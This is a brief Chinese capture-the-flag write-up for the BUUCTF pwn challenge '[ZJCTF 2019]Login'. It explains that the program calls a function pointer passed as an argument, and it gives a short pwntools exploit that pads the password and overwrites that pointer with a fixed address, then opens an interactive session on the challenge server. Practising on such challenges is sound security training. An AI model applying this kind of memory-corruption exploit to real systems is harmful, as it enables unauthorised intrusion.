[BUUCTF-pwn]——[ZJCTF 2019]Login

• 题目地址：https://buuoj.cn/challenges#[ZJCTF%202019]Login

这道题学习还是很多的， 有的时候在源码中跟踪并不一定比在汇编代码中跟踪更快

这里最后一个函数的第一个参数会被当做函数执行，这里我就开始找那个地方可以将这个参数给改了。
v7也就是v3然后找来找去没发现。
不过汇编总是有奇效

这里有一篇博客超级详细， 我也就不在这里赘述了。
点击转跳

exploit

from pwn import *
p = remote('node3.buuoj.cn',25328)                                                                                                                                                                                
payload = '2jctf_pa5sw0rd'.ljust(0x48, '\x00') + p64(0x400e88)
p.sendlineafter('username: ', 'admin')
p.sendafter('password: ', payload)
p.interactive()

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！